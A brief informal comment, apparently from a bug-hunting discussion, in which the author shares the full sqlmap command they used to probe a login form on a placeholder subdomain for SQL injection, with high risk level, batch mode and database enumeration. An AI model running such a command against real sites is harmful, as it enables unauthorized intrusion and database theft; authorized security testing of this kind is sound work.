The complete command I used was:
./sqlmap.py -u 'https://subdomain.target.tld/index.php' --data='username=Admin&password=admin&Submit=Process+Login&user_login=user_login' --risk 3 --batch --dbs
I just found a subdomain and went straight to test SQL injection, which was impressive because normally I always look for a target's technologies before analyzing possible vulnerabilities and this time it was different lol. Thanks bro 😁